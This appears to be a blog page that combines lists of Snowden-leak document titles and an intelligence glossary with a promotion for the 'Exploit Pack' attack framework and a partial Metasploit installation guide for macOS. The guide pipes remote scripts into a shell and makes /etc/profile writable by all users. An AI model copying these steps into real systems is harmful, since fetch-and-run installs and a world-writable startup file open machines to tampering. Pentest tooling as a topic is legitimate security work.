The Snowden Documents That Where Published On ‘The Intercept’

---

This are all the Documents (coming from Ed Snowden) that are published by the journalist Glenn Greenwald, on his so called website: THE INTERCEPT (https://firstlook.org/theintercept)

Glenn started his project The Intercept, this month exactly one year ago.
Newer documents that got released later then this blog post can be found on:
https://firstlook.org/theintercept/documents

---

• CNE Access to Core Mobile Networks

  02/19/2015

• ---

  PCS Harvesting at Scale

  02/19/2015

• ---

  CCNE Email Addresses Jan10-Mar10 Trial

  02/19/2015

• ---

  CCNE Email Harvesting Jan10-Mar10 Trial

  02/19/2015

• ---

  CCNE Stats Summaries Jan10-Mar10 Trial

  02/19/2015

• ---

  IMSIs Identified with Ki Data for Network Providers Jan10-Mar10 Trial

  02/19/2015

• ---

  DAPINO GAMMA Target Personalisation Centres Gemalto Wiki

  02/19/2015

• ---

  DAPINO GAMMA Gemalto Yuaawaa Wiki

  02/19/2015

• ---

  CCNE Successes Jan10-Mar10 Trial

  02/19/2015

• ---

  DAPINO GAMMA CNE Presence Wiki

  02/19/2015

• ---

  Where Are These Keys?

  19 Feb 2015

• ---

  CNE Access to Core Mobile Networks

  19 Feb 2015

• ---

  Iran – Current Topics, Interaction with GCHQ

  10 Feb 2015

• ---

  NATO Civilian Intelligence Council – Cyber Panel – US Talking Points

  04 Feb 2015

• ---

  INTOLERANT – Who Else Is Targeting Your Target? Collecting Data Stolen by Hackers

  04 Feb 2015

• ---

  LOVELY HORSE – GCHQ Wiki Overview

  04 Feb 2015

• ---

  HAPPY TRIGGER/LOVELY HORSE/Zool/TWO FACE – Open Source for Cyber Defence/Progress

  04 Feb 2015

• ---

  GCHQ – Belgacom connections

  13 Dec 2014

• ---

  Hopscotch

  13 Dec 2014

• ---

  GCHQ NAC review – January to March (2012)

  13 Dec 2014

• ---

  GCHQ NAC review – July to September (2011)

  13 Dec 2014

• ---

  GCHQ NAC review – April to June (2011)

  13 Dec 2014

• ---

  GCHQ NAC review – January to March (2011)

  13 Dec 2014

• ---

  GCHQ NAC review – October to December (2011)

  13 Dec 2014

• ---

  GCHQ – Stargate CNE requirements

  13 Dec 2014

• ---

  GCHQ – Making network sense of the encryption problem (2011)

  13 Dec 2014

• ---

  GCHQ – Mobile Networks in My NOC World (2011)

  13 Dec 2014

• ---

  GCHQ – Automated NOC detection (2011)

  13 Dec 2014

• ---

  Committee Study of the Central Intelligence Agency’s Detention and Interrogation Program

  09 Dec 2014

• ---

  NSA/GCHQ/CSEC Network Tradecraft Advancement Team (2010)

  04 Dec 2014

• ---

  AURORAGOLD project overview (2011)

  04 Dec 2014

• ---

  OPULENT PUP encryption attack

  04 Dec 2014

• ---

  WOLFRAMITE encryption attack

  04 Dec 2014

• ---

  AURORAGOLD working aid

  04 Dec 2014

• ---

  NSA First-Ever Collect of High-Interest 4G Cellular Signal

  04 Dec 2014

• ---

  IR.21 – A Technology Warning Mechanism

  04 Dec 2014

• ---

  AURORAGOLD – Target Technology Trends Center support to WPMO (2011)

  04 Dec 2014

• ---

  AURORAGOLD Working Group

  04 Dec 2014

• ---

  Hacking Team RCS 9.1 Changelog

  30 Oct 2014

• ---

  Hacking Team RCS 9.0 Changelog

  30 Oct 2014

• ---

  Hacking Team RCS Invisibility Report

  30 Oct 2014

• ---

  Hacking Team RCS 9 System Administrator’s Guide

  30 Oct 2014

• ---

  Hacking Team RCS 9 Technician’s Guide

  30 Oct 2014

• ---

  Hacking Team RCS 9 Administrator’s Guide

  30 Oct 2014

• ---

  Hacking Team RCS 9 Analyst’s Guide

  30 Oct 2014

• ---

  Affidavit of Richard Holcomb

  15 Oct 2014

• ---

  Indictment in U.S. vs. Hall and Landersman

  15 Oct 2014

• ---

  UN Report on Human Rights and Terrorism

  15 Oct 2014

• ---

  CNO Security Framework

  10 Oct 2014

• ---

  CNO Core Secrets Slide Slices

  10 Oct 2014

• ---

  Exceptionally Controlled Information Compartments

  10 Oct 2014

• ---

  NSA Classification Guide for ECI Pawleys

  10 Oct 2014

• ---

  National Initiative Protection Program — Sentry Eagle

  10 Oct 2014

• ---

  Target Exploitation Classification Guide

  10 Oct 2014

• ---

  ECI WHIPGENIE Classification Guide

  10 Oct 2014

• ---

  CNO Core Secrets Security Structure

  10 Oct 2014

• ---

  NSA Exceptionally Controlled Information Listing, 12 September 2003

  10 Oct 2014

• ---

  CNO Core Secrets

  10 Oct 2014

• ---

  Computer Network Exploitation Classification Guide

  10 Oct 2014

• ---

  Opinion Unsealing Video of Force-Feeding at Guantanamo

  03 Oct 2014

• ---

  Opinion on Motion To Close Dhiab Force-Feeding Case

  02 Oct 2014

• ---

  Department of Justice Prosecutive Summary into NSA and CIA Criminal Activities

  02 Oct 2014

• ---

  Report on Inquiry Into CIA Related Electronic Surveillance Activities

  02 Oct 2014

• ---

  New Zealand Visit Precis

  15 Sep 2014

• ---

  GCHQ Attack on Stellar PCS

  14 Sep 2014

• ---

  Treasure Map Announcement

  14 Sep 2014

• ---

  Treasure Map Presentation

  14 Sep 2014

• ---

  Quadrennial Intelligence Review Final Report, 2009

  05 Sep 2014

• ---

  Email Correspondence Between Reporters and CIA Flacks

  04 Sep 2014

• ---

  GCHQ Surveillance Summary

  31 Aug 2014

• ---

  GCHQ Surveillance Summary

  31 Aug 2014

• ---

  Turkey at the G20 Pre-Meeting in London, September 2-5, 2009

  31 Aug 2014

• ---

  Turkey Energy Company Development

  31 Aug 2014

• ---

  Kurdistan Regional Government

  31 Aug 2014

• ---

  Turkey and the Kurds

  31 Aug 2014

• ---

  Collaboration in Overdrive: A CNE Success

  31 Aug 2014

• ---

  Turkey and the PKK

  31 Aug 2014

• ---

  Foreign Relations Mission Titles

  31 Aug 2014

• ---

  Seminar: Turkish Presidential and Parliamentary Elections

  31 Aug 2014

• ---

  Information Paper- NSA Intelligence Relationship With Turkey

  31 Aug 2014

• ---

  NSA’s Oldest Third Party SIGINT Relationship

  31 Aug 2014

• ---

  Strategic Intelligence Issue Seminars- Turkey

  30 Aug 2014

• ---

  Turkey/NSA Meeting Agenda

  30 Aug 2014

• ---

  ICREACH Wholesale Sharing (2007)

  25 Aug 2014

• ---

  Black Budget Extracts

  25 Aug 2014

• ---

  Sharing SIGINT metadata on ICREACH

  25 Aug 2014

• ---

  CRISSCROSS/PROTON Point Paper

  25 Aug 2014

• ---

  Metadata Sharing Memorandum (2005)

  25 Aug 2014

• ---

  Decision Memorandum for the DNI on ICREACH

  25 Aug 2014

• ---

  Sharing Communications Metadata Across the U.S. Intelligence Community

  25 Aug 2014

• ---

  CIA Colleagues Enthusiastically Welcome NSA Training

  25 Aug 2014

• ---

  Metadata Policy Conference (2008)

  25 Aug 2014

• ---

  GCHQ Covert Mobile Phones Policy

  12 Aug 2014

• ---

  Directorate of Terrorist Identities (DTI) Strategic Accomplishments 2013

  05 Aug 2014

• ---

  NSA Intelligence Relationship with Israel

  03 Aug 2014

• ---

  Israel-US 1999 Agreement

  03 Aug 2014

• ---

  Saudi Arabia Information Paper

  25 Jul 2014

• ---

  March 2013 Watchlisting Guidance

  23 Jul 2014

• ---

  JTRIG Tools and Techniques

  14 Jul 2014

• ---

  FISA dataflow

  08 Jul 2014

• ---

  SOMALGET

  19 May 2014

• ---

  SSO May 2, 2013

  19 May 2014

• ---

  SSO May 3, 2013 – MYSTIC

  19 May 2014

• ---

  SSO May 3, 2012

  19 May 2014

• ---

  SSO March 14, 2013

  19 May 2014

• ---

  SSO April 18, 2013 – What’s New

  19 May 2014

• ---

  Black Budget

  19 May 2014

• ---

  SIDToday: DEA – The “Other” Warfighter

  19 May 2014

• ---

  SSO Dictionary Excerpt

  19 May 2014

• ---

  MYSTIC

  19 May 2014

• ---

  Lobban NSA Visit Précis

  30 Apr 2014

• ---

  PRISM Olympic Option

  30 Apr 2014

• ---

  GHOSTMACHINE: Identifier Lead Triage with ECHOBASE

  30 Apr 2014

• ---

  2009 SigDev Conference

  04 Apr 2014

• ---

  Full-Spectrum Cyber Effects

  04 Apr 2014

• ---

  I Hunt Sys Admins

  20 Mar 2014

• ---

  Video: How the NSA Secretly Masqueraded as Facebook to Hack Computers for Surveillance

  17 Mar 2014

• ---

  Third Party Relationships

  13 Mar 2014

• ---

  Industrial-Scale Exploitation

  12 Mar 2014

• ---

  VPN and VOIP Exploitation With HAMMERCHANT and HAMMERSTEIN

  12 Mar 2014

• ---

  TURBINE and TURMOIL

  12 Mar 2014

• ---

  The NSA and GCHQ’s QUANTUMTHEORY Hacking Tactics

  12 Mar 2014

• ---

  Quantum Insert Diagrams

  12 Mar 2014

• ---

  NSA Phishing Tactics and Man in the Middle Attacks

  12 Mar 2014

• ---

  There Is More Than One Way to Quantum

  12 Mar 2014

• ---

  Selector Types

  12 Mar 2014

• ---

  NSA Technology Directorate Analysis of Converged Data

  12 Mar 2014

• ---

  Five Eyes Hacking Large Routers

  12 Mar 2014

• ---

  Menwith Hill Station Leverages XKeyscore for Quantum Against Yahoo and Hotmail

  12 Mar 2014

• ---

  Thousands of Implants

  12 Mar 2014

• ---

  An Interview with Zelda

  07 Mar 2014

• ---

  Guilty Until Proven Innocent

  07 Mar 2014

• ---

  Is Bain De Soleil a Bane on NSA?

  07 Mar 2014

• ---

  Silenced in SID

  07 Mar 2014

• ---

  The Art of Deception: Training for a New Generation of Online Covert Operations

  24 Feb 2014

• ---

  Psychology: A New Kind of SIGDEV

  18 Feb 2014

• ---

  Discovery SIGINT Targeting Scenarios and Compliance

  18 Feb 2014

  ---

How to Read the NSA Documents: This glossary helps explain important terms.

---

---

Intelligence services are fond of code names and abbreviations. This glossary helps explain important terms.

---

---

BfV — Federal Office for the Protection of the Constitution. This is Germany’s domestic intelligence agency and it cooperates closely with the NSA. In addition to the federal office, there are state offices in each of Germany’s 16 states, all of which work closely with the BfV.

---

BND — The Bundesnachrichtendienst, Germany’s foreign intelligence agency. It cooperates closely with the NSA, particularly on counter-terrorism.

---

Boundless Informant — This NSA computer program generates heat maps displaying the amount of metadata the NSA has at its disposal at any given time and can be sorted by country. The display is color coded, with green indicating a lower amount of data and red showing a high amount.

---

BSI — The Federal Office for Information Security. Once a part of the BND, this agency works under the auspices of Germany’s Interior Ministry. It is responsible for the protection of government networks, among other duties.

---

CCE — Center for Content Extraction. A department of the NSA, the CCE is responsible for the automatic analysis and filtering of text documents.

---

CSS — Central Security Service. The military arm of the NSA, responsible for the exchange of information and coordination with the military. The head of NSA also leads CSS.

---

CT — Counter-terrorism

---

DNI — Digital Network Intelligence. This refers to the monitoring of digital communications such as emails, FTP, chat and the activities of routers and other networks. DNI can also be used as an abbreviation for Director of National Intelligence, the secret service coordinator in the White House.

---

ECC — European Cryptologic Center. Established in 2011 as the successor organization to the European Security Operations Center (ESOC), it is located in the Dagger Complex near Griesheim and had 240 employees when it opened.

---

ETC — The European Technical Center in Wiesbaden. It is the NSA’s European communications headquarters and was modernized in 2011.

---

FVEY — Denotes documents that can be shared within the “Five Eyes” intelligence alliance, to which the US, Great Britain, New Zealand, Australia and Canada belong.

---

GCHQ — Government Communications Headquarters, the British intelligence agency and a partner of the NSA within the Five Eyes alliance.

---

JSA — Joint SigInt Activity. Denotes the technical surveillance partnership between the NSA and BND in Bad Aibling.

---

NOFORN — Abbreviation for “no foreigners,” meaning the documents can only be seen by US citizens.

---

NSA — The National Security Agency

---

OPSEC — Operations Security. This refers to the protection of important information from enemies, hackers and spies.

---

PRISM — The NSA program with allows agencies to access information from at least nine large American providers such as Google, Facebook and Apple.

---

SCS — Special Collection Service. A unit operated jointly by NSA and CIA personnel that performs technical surveillance out of US embassies and consulates around the world. The number of SCS sites varies. As of 2013, there were 80, including in Frankfurt and Berlin.

---

SELECTOR — Entries such as telephone numbers and email addresses targeted by surveillance.

---

SID — Signals Intelligence Directorate. This is an NSA department that is responsible for collection, analysis and dispersal of information and intelligence.

---

SIGAD — SigInt Activity Designator. Refers to signals intelligence producers and sources. The PRISM program, for example, is designated as SIGAD US-984XN.

---

SIGDEV — Abbreviation for SIGINT Development, the systematic acquisition of new SIGINT sources.

---

SIGINT — Signals Intelligence. This refers to the acquisition of intelligence via the surveillance of electronic signals, such as intercepting satellite communications or tapping into Internet data streams.

---

SUSLAG — Special US Liaison Activity Germany, the NSA’s liaison office in Germany. Since 2004, it has been located in the Mangfall Kaserne in Bad Aibling.

---

TEMPORA — This is the name of a British surveillance program that intercepts global data traffic at major hubs and saves some of it temporarily. The NSA and GCHQ work closely together in analyzing the data.

---

TS — Abbreviation for Top Secret

---

WHARPDRIVE — A joint operation of the NSA and BND along with a third partner to access international data streams.

---

XKeyscore — Software that allows analysts to search for possible targets before they have been formally identified. It can encompass all data received (“full take”) and can rapidly access usernames and passwords.

---

Edward Snowden’s Germany Files – The NSA in Germany

---

• Nostalgic recollections out of the NSA intranet from NSA workers formerly stationed in Bad Aibling
• Document excerpt on the sharing of the NSA spy tool XKeyscore with the Federal Office for the Protection of the Constitution (BfV), Germany’s domestic intelligence agency
• Secret document on the cooperation between the NSA, BND and BfV in the fight against terrorism
• Preliminary agenda of a meeting between high-ranking NSA and BND officials
• Briefing on the visit to the NSA of a high-ranking BND official
• Final agenda of a meeting between high-ranking NSA and BND officials
• Internal NSA presentation on the BND’s organization
• Internal NSA discussion guidelines relating to cooperation with the BND and BfV
• Internal NSA discussion guidelines in preparation for a meeting with high-ranking BND officials
• Comprehensive internal summary of the history and current state of cooperation between the NSA and BND
• FAQs on the Boundless Informant program
• Boundless Informant statistics on Germany
• Boundless Informant overview (global)
• Boundless Informant statistics for so-called Third Parties, which includes Germany
• Boundless Informant statistics on data from “Foreign Partners”
• Overview of the use of Boundless Informant (world map)
• World map from the Boundless Informant program
• Zoom of a Boundless Informant document, with project names
• Agenda for the visit of BSI Vice President Andreas Könen to the NSA
• Report on the beginnings of the European Security Center (ESC) in the Dagger Complex
• Report on the changing of the ESC’s name to European Security Operations Center (ESOC)
• ESOC: Report on the experiences of one NSA worker
• Report on the changing of the ESOC’s name to European Cryptologic Center (ECC) including details on missions launched from there
• Report on an XKeyscore training session at the ECC / Dagger Complex
• Presentation on the spying program PRISM and ECC’s participation
• NSA/CSS presentation on technical surveillance in Europe and Africa
• Report on an unexploded ordnance alarm at the European Technical Center in the Mainz-Kastel neighborhood of Wiesbaden
• Report on an NSA SIGDEV training course for allied countries
• Report on the technical expansion of the European Technical Center in the Mainz-Kastel neighborhood of Wiesbaden
• Report on the NSA-BND cooperation known as Joint SIGINT Activity (JSA)
• Report on the surveillance of African countries by JSA
• Restrictions on the technical surveillance performed by JSA
• Report on data exchange between the NSA and BND within the JSA framework
• Merkel in the database: Presentation from the Center for Content Extraction
• Report on the NSA’s access to TEMPORA
• Report on the work of NSA/CSS Europe, including the capture or killing of 40 terror suspects
• Guidelines for the classification of NSA SIGINT details (1945-1967)
• Slide: Worldwide locations of the Cryptologic Services Groups
• Slide: Worldwide locations of NSA/CSS satellite surveillance
• US sites with NSA personnel in Germany
• Logo of NSA-BND cooperation
• Explanation of Nymrod, a system for searching for people and places in databases and documents
• NSA presentation on the work of Nymrod
• Report on an NSA visit to the BND site in Schöningen and on data transfer from the BND to the NSA
• Presentation on the NSA/CIA unit Special Collection Service (SCS), active in US embassies around the world
• Report on the one-year anniversary of the NSA liaison unit SUSLAG at the new site in the Mangfall Kaserne in Bad Aibling
• Guidelines for the classification of SUSLAG details and the NSA-BND cooperation
• GCHQ report on the technical abilities of the powerful spying program TEMPORA, which allows for a “full take”
• Report on a WHARPDRIVE incident in an SSO presentation
• Details on XKeyscore from an internal GCHQ website
• Boundless Informant statistics on Great Britain
• European Technical Center: Report on the experiences of one NSA
• NSA/CSS Europe: Report on the experiences of one NSA worker

---

---

NSA Sites in Germany:

---

---

Dokumente über die Zusammenarbeit mit deutschen Diensten und Behörden

---

• Dokumentausschnitt über die Weitergabe des NSA-Spähwerkzeugs XKeyscore an das Bundesamt für Verfassungsschutz (BfV)
• Geheimdokument zur Zusammenarbeit zwischen NSA, BND und Verfassungsschutz im Kampf gegen Terroristen
• Vorläufiger Ablaufplan eines Treffens zwischen hochrangigen Mitarbeitern von NSA und BND
• Briefing zum Besuch hochrangiger BND-Mitarbeiter bei der NSA
• Endgültiger Ablaufplan eines Treffens zwischen hochrangigen Mitarbeitern von NSA und BND
• Interne Präsentation über den Aufbau des BND
• Interner Gesprächsleitfaden der NSA zum Thema Zusammenarbeit mit BND und Verfassungsschutz
• Interner Gesprächsleitfaden der NSA in Vorbereitung eines Treffens mit hochrangigen BND-Mitarbeitern
• Umfassende interne Übersicht über die Historie und den aktuellen Stand der Zusammenarbeit zwischen NSA und BND
• Agenda des Besuchs von BSI-Vize-Präsident Andreas Könen bei der NSA
• Bericht über die NSA-BND-Kooperation Joint SIGINT Activity (JSA)
• Bericht über die Ausspähung afrikanischer Staaten durch die JSA
• Einschränkungen für die im JSA durchgeführte technische Aufklärung
• NSA-Adler mit Deutschlandflagge: Logo der Zusammenarbeit zwischen NSA und BND
• Bericht über den Datentaustausch zwischen NSA und BND im Rahmen von JSA
• Bericht über die Arbeit von NSA/CSS Europe, 40 gefangene oder getötete Terrorverdächtige
• Bericht über einen Besuch der NSA beim BND-Standort Schöningen und Datenweitergabe vom BND an die NSA
• Bericht über das einjährige Bestehen der NSA-Verbindungseinheit SUSLAG am neuen Standort in der Mangfall-Kaserne/Bad Aibling
• Anleitung zur Klassifizierung von Details zu SUSLAG und NSA-BND-Kooperationen

---

Dokumente über NSA-Standorte in Deutschland

---

• Wehmütige, nostalgische Erinnerungen von ehemals in Bad Aibling stationierten NSA-Mitarbeitern aus dem NSA-Intranet
• Bericht über die Anfänge des European Security Center (ESC) im Dagger Complex
• Bericht über die Umbenennung des ESC in European Security Operations Center (ESOC)
• ESOC: Erfahrungsbericht eines NSA-Mitarbeiters
• Bericht über Umbenennung des ESOC in European Cryptologic Center (ECC) samt Details zu den von dort ausgeführten “Missionen”
• European Technical Center: Erfahrungsbericht eines NSA-Mitarbeiters
• Bericht über einen Blindgänger-Alarm beim European Technical Center in Wiesbaden Mainz-Kastel
• Bericht über den technischen Ausbau des European Technical Center in Wiesbaden Mainz-Kastel
• NSA/CSS Europe: Erfahrungsbericht eines NSA-Mitarbeiters
• Folie: Weltweite Standorte der Cryptologic Services Groups
• Folie: Weltweite Standorte der Satelliten-Überwachung der NSA/CSS
• US-Stützpunkte mit NSA-Personal in Deutschland

---

Dokumente über Programme und Arbeitsweisen der NSA

---

• Merkel in der Datenbank: Präsentation des Center for Content Extraction
• Umfassende interne Übersicht über die Historie und den aktuellen Stand der Zusammenarbeit zwischen NSA und BND
• Fragen und Antworten (FAQ) zum Programm BOUNDLESS INFORMANT
• BOUNDLESS INFORMANT-Statistik für Deutschland
• BOUNDLESS INFORMANT-Statistik für Großbritannien
• BOUNDLESS INFORMANT-Übersicht (global)
• BOUNDLESS INFORMANT-Statistik für die sogenannten 3rd Partys (zu denen auch Deutschland zählt)
• BOUNDLESS INFORMANT-Statistik zu Daten von “Foreign Partners”
• Übersicht über den Einsatz des Programms BOUNDLESS INFORMANT / Weltkarte
• Weltkarte aus dem Programm BOUNDLESS INFORMANT
• Zoom in ein Dokument zu BOUNDLESS INFORMANT mit Projektnamen
• Bericht über ein XKeyscore-Training im ECC / Dagger Complex
• Präsentation über das Spähprogramm PRISM und die Beteiligung des ECC
• NSA/CSS-Präsentation über technische Überwachung in Europa und Afrika
• Bericht über einen NSA-Lehrgang über geheime Datenerlangung für befreundete Staaten
• Bericht über den NSA-Zugriff auf TEMPORA
• Anleitung zur Klassifizierung von SIGINT-Details der NSA (1945-1967)
• Erklärung zu Nymrod, einem System zur Namenssuche
• NSA-Präsentation zur Arbeitsweise von Nymrod
• Präsentation der in US-Botschaften weltweit agierenden NSA/CIA-Einheit “Special Collection Service” (SCS)
• GCHQ-Bericht über die technischen Fähigkeiten des mächtigen Spähprogramms TEMPORA, das den “Full take” erlaubt
• Bericht über WHARPDRIVE-Zwischenfall in einer SSO-Präsentation
• Details zu XKeyscore auf einer internen GCHQ-Website

---

NSA Documents: Network Attacks and Exploitation / Malware and Implants / Exfiltration / Fourth Party Access / Botnet Takeovers

---

NSA Docs on Network Attacks and Exploitation:

---

• Excerpt from the secret NSA budget on computer network operations / Code word GENIE
• Document about the expansion of the Remote Operations Center (ROC) on endpoint operations
• Document explaining the role of the Remote Operations Center (ROC)
• Interview with an employee of NSA’s department for Tailored Access Operations about his field of work
• Supply-chain interdiction / Stealthy techniques can crack some of SIGINT’s hardest targets
• Classification guide for computer network exploitation (CNE)
• NSA training course material on computer network operations
• Overview of methods for NSA integrated cyber operations
• NSA project description to recognize and process data that comes from third party attacks on computers
• Exploring and exploiting leaky mobile apps with BADASS
• Overview of projects of the TAO/ATO department such as the remote destruction of network cards
• iPhone target analysis and exploitation with Apple’s unique device identifiers (UDID)
• Report of an NSA Employee about a Backdoor in the OpenSSH Daemon
• NSA document on QUANTUMSHOOTER, an implant to remote-control computers with good network connections from unknown third parties

---

NSA Docs on Malware and Implants:

---

• CSEC document about the recognition of trojans and other “network based anomaly”
• The formalized process through which analysts choose their data requirement and then get to know the tools that can do the job
• QUANTUMTHEORY is a set of technologies allowing man-on-the-side interference attacks on TCP/IP connections (includes STRAIGHTBIZARRE and DAREDEVIL)
• Sample code of a malware program from the Five Eyes alliance

---

NSA Docs on Exfiltration:

---

• Explanation of the APEX method of combining passive with active methods to exfiltrate data from networks attacked
• Explanation of APEX shaping to put exfiltrating network traffic into patterns that allow plausible deniability
• Presentation on the FASHIONCLEFT protocol that the NSA uses to exfiltrate data from trojans and implants to the NSA
• Methods to exfiltrate data even from devices which are supposed to be offline
• Document detailing SPINALTAP, an NSA project to combine data from active operations and passive signals intelligence
• Technical description of the FASHIONCLEFT protocol the NSA uses to exfiltrate data from Trojans and implants to the NSA

---

NSA Docs on Fourth Party Access:

---

• Description of an NSA employee on fifth party access / When the targeted fourth party has someone under surveillance who puts others under surveillance
• 4th party collection / Taking advantage of non-partner computer network exploitation activity
• Combination of offensive and defensive missions / How fourth-party missions are being performed
• Overview of the TRANSGRESSION program to analyze and exploit foreign CNA/CNE exploits
• NSA example SNOWGLOBE, in which a suspected French government trojan is analyzed to find out if it can be helpful for own interests
• NSA fourth party access / “I drink your milkshake”
• NSA Program TUTELAGE to instrumentalize third party attack tools
• Codename BYZANTINE HADES / NSA research on the targets of Chinese network exploitation tools, the targets and actors
• CSEC document on the handling of existing trojans when trojanizing computers
• Analysis of Chinese methods and performed actions in the context of computer network exploitation

---

NSA Docs on Botnet Takeovers:

---

• Overview on the NSA use of bots and the DEFIANTWARRIOR program
• HIDDENSALAMANDER / Program for the recognition of botnet activity and options for takeover of clients and data

---

---

The full article from these documents comes again from Der Spiegel, and can be found here:

• Part 1: NSA Preps America for Future Battle
• Part 2: How the NSA Reads Over Shoulders of Other Spies

---

The German version can be found on:
http://www.spiegel.de/netzwelt/netzpolitik/snowden-dokumente-wie-die-nsa-digitale-kriege-vorbereitet-a-1013521.html

---

Pentesting-Tool Exploit Pack for Windows, Linux and Mac OS X +Exploit and Security Video Tutorials

Next generation exploit framework

Cyber security risk assessment and explotation
“Think like a hacker, be professional”

Exploit Packs

Get all the exploits you need in a pack for the platform you need to test. Today.
What are the Packs?

Exploit packs are distributed via web or as a bundle ( tipically a gzip file ) and contain additional modules that plug directly into Exploit Pack. Installation is usually simple, often just expanding desired tree, all the arsenal you need. Give some ammo to your weapons by upgrading Exploit Pack with Packs.

We deliver this Packs online ( using credentials ) or via a bundle Gzip, and the donations received from it are used to keep the project going.

Cross-platform Software, works for Windows, Linux and Mac OS X

For the download and more info go to: http://exploitpack.com/index.html
or visit: http://exploitpack.com/ExploitPack338.zip

Security Tutorials

			Exploit Dev – #1 Windows – Stack Based Overflow		Juan Sacco		6:09
			Exploit Dev – #2 Windows – Control of EIP		Juan Sacco		22:08
			Exploit Dev – #1 Linux – Stack Based Overflow		Juan Sacco		3:21
			Exploit Dev – #2 Linux – Control of EIP		Juan Sacco		23:28
			Exploit Dev – #3 Linux – Shellcode execution		Juan Sacco		10:18
			Exploit Dev – #3 Windows – SEH + Shellcode		Juan Sacco		9:14
			Rootkit Development #1		Juan Sacco		8:24
			Rootkit Development #2		Juan Sacco		15:40

Exploit Pack

			Exploit Pack #1 – Add an exploit using the Wizard		Juan Sacco		7:47
			Exploit Pack #2 – How to install		Juan Sacco		3:33
			Exploit Pack #3 – AutoPwn		Juan Sacco		7:49
			Exploit Pack #4 – Remote scanner		Juan Sacco		2:55
			Exploit Pack #5 – Preference and Search box		Juan Sacco		3:40
			Exploit Pack #6 – Reverse shell		Juan Sacco		6:27
			Exploit Pack #7 – Update manager		Juan Sacco		3:12
			Exploit Pack #7 – Module Wizard		Juan Sacco		7:00
			Exploit Pack #8 – Creating a report		Juan Sacco		8:04
			Exploit Pack #9 – Exploit an FTP Server		Juan Sacco		7:29

.

.

Security Tutorials Playlist:
https://www.youtube.com/playlist?list=PLMnFqffzHenvhO2-qFllLiWPA39K3KIUW

Exploit Pack Playlist:
https://www.youtube.com/playlist?list=PLMnFqffzHensjfrCgA49vc37Btx61feq6

PowerShell Basics

The Environment – First blog post of the series covering what is PowerShell, It’s main components and how to setup your environment for getting the most out if it.

Help Subsystem – Blog post covering how to use the help subsystem in PowerShell for learning how to use PowerShell and it commands.

Running Commands – The Basics or running commands in PowerShell and how to manage the aliases for the commands.

Objects and the Pipeline – The baiscs of using the pipeline in PowerShell and how it differes from other shells in terms of the type of data that is processed.

Filtering and Iterating over Objetcs – The basics of filtering objects and iterating thru collections of objects thru the pipeline or stored in variables.

Extending the Shell with Modules and Snapins – The basics of extending a PowerShell session using modules and PSSanpins.

Installing Metasploit Framework on Mountain Lion and Mavericks

This Guide covers the installation of Metasploit Framework OSS Project on OSX Lion and Mountain Lion. Waiting for the symlink fix so as to update the script

This guide uses Homebrew as well as the script to provide the necessary packages to run Metasploit. If you have MacPorts this guide will not work and will cause problems. 

Dependencies

Make sure you run software update and install all updates for the operating system and install the latest version of Xcode so as to be able to compile software.

Installing Command Line Development Tools Xcode 4 on Mountain Lion

If you are running Xcode 4 you will need to go to Xcode Preference and choose the command line tools and download and install from the components

Installing Command Line Development Tools Xcode 5 on Mountain Lion

If you are running Xcode 5  you will need to go to Xcode Preference and choose the command line tools and download and install from the components

Installing Command Line Development Tools Xcode 5 on Mavericks

On OS X Mavericks the Command Line Developer Tools package can be installed on demand using “xcode-select –install” and the installed tools will be automatically updated using Software Update. Once you run the command the following dialog should appear and just click on Install

Java

Download the latest Java JDK 8 from Oracle. This should set all the proper shortcuts for the Java binaries http://www.oracle.com/technetwork/java/javase/downloads/index.html

Test that Java is properly installed by running

java -version

It should return the version of Java you just installed.  To check tha the location is /usr/bin/java for the link run:

whereis java

If both commands runs and the location is correct Java is properly installed on the system.

Manual Installation

Install Homebrew

/usr/bin/ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)"

We need to make sure that the binaries we install with homebrew are first in the path:

echo PATH=/usr/local/bin:/usr/local/sbin:$PATH >> ~/.bash_profile

source ~/.bash_profile

brew tap homebrew/versions

Install Nmap

For Nmap in the case of OSX I recommend the use of Homebrew since they are quite quick and keeping their formulas updated for the tool and work out most of the problems that may arise quite quickly. To install Nmap just run the command bellow:

brew install nmap

Install Ruby 2.1

On OS X we have 3 methods for installing ruby 2.1.x these are:

• Homebrew
• RVM (Ruby Version Manager)
• rbenv

Installing Ruby using Homebrew:

brew install homebrew/versions/ruby21

Check that yo are running the version of ruby you just installed with:

ruby -v

Installing Ruby using RVM:

curl -L https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bash_profile
source ~/.bash_profile
rvm install 2.1.5
rvm use 2.1.5 --default
ruby -v

Installing Ruby using rbenv:

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile
echo 'eval "$(rbenv init -)"' >> ~/.bash_profile
source ~/.bash_profile

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bash_profile
source ~/.bash_profile
rbenv install 2.1.5
rbenv global 2.1.5
ruby -v

Once the packages have been install we need to install the required Ruby libraries that metasploit depends on:

sudo gem install bundler

Install PostgreSQL

brew install postgresql --without-ossp-uuid

Configure PostgreSQL

Init the Database if this is a first time install:

initdb /usr/local/var/postgres

Configure Postgres to automatically load on login, the instruction bellow are as an example copy and paste the commands that the brew installer showed and follow any other instruction it shows :

mkdir -p ~/Library/LaunchAgents
cp /usr/local/Cellar/postgresql/9.1.4/homebrew.mxcl.postgresql.plist ~/Library/LaunchAgents/
launchctl load -w ~/Library/LaunchAgents/homebrew.mxcl.postgresql.plist

PostgreSQL will now start every time a user logs in. Create user called msf for use in Metasploit:

createuser msf -P -h localhost

Create database for use with metasploit called msf and make the user msf the owner:

createdb -O msf msf -h localhost

Record the password used for the account created since it will be used when configuring the framework.

Installing Metasploit Framework

For regular use of the framework only needs to clone the Git repository and create the necessary links and set the variable for the database config file

Create Symlink Copy for Regular Use

WARNING: Currently there is a bug in Metasploit Framework with Symlinks: https://github.com/rapid7/metasploit-framework/issues/4602

cd /usr/local/share/

git clone https://github.com/rapid7/metasploit-framework.git

cd metasploit-framework

for MSF in $(ls msf*); do ln -s /usr/local/share/metasploit-framework/$MSF /usr/local/bin/$MSF;done

sudo chmod go+w /etc/profile

sudo echo export MSF_DATABASE_CONFIG=/usr/local/share/metasploit-framework/config/database.yml >> /etc/profile

From the Metasploit-Framework folder lets use the Bundler Gem to install the properly supportted Gem versions:

bundle install

Before starting to use the framework we need to create the database config file and set the parameters:

